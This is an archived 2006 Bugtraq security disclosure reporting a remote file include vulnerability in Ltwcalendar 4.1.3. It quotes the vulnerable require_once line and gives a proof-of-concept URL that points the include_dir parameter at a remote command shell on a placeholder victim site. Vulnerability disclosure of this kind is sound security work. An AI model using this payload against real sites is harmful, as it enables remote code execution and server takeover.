lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20060613161534.19369.qmail@securityfocus.com> Date: 13 Jun 2006 16:15:34 -0000 From: SpC-x@...mail.org To: bugtraq@...urityfocus.com Subject: Ltwcalendar 4.1.3 version - Remote File Include Vulnerabilities # SaVSaK.CoM | SpC-x - The_BeKiR | # Ltwcalendar 4.1.3 version - Remote File Include Vulnerabilities # Risk : High # Class: Remote # Script : Ltwcalendar # Credits : SpC-x # Thanks : The_BeKiR - Ejder - FasTBoY - ERNE - RMx # Code : # require_once('./private/ltw_config.php'); require_once($ltw_config['include_dir'].'/ltw_classes.php'); # Vulnerable : # http://www.victim.com/Ltwcalendar/calendar.php?ltw_config[include_dir]=Command-Shell